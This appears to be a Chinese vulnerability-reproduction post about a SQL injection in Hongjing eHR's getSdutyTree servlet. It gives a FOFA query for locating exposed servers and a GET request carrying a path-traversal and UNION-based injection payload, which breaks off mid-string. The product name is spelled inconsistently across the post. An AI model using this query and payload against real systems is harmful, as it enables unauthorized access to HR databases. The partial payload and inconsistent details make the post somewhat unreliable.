0x01 产品简介
宏晶eHR人力资源管理软件是一款集成人力资源管理和数字化应用的软件,以满足动态、协作、流程导向的战略需求。
0x02 漏洞概述
Honjing eHR /servlet/sduty/getSdutyTree 接口中存在SQL 注入漏洞,该漏洞可能允许未经身份验证的远程攻击者结合可能受控的数据库执行任意命令。经分析判断,该漏洞利用难度较大,建议您尽快修复。
0x03 复现环境
FOFA:app=\’HJSOFT-HCM\’
0x04 漏洞复现
示范实验
GET /w_selfservice/oauthservlet/%2e./.%2e/servlet/sduty/getSdutyTree?param=childtarget=1codesetid=1codeitemid=1%27+UNION+ALL+SELECT+NULL%2CCHAR%2811
#宏景eHR sduty/getSdutyTree 以上SQL注入漏洞复现相关内容来自互联网,仅供参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92823.html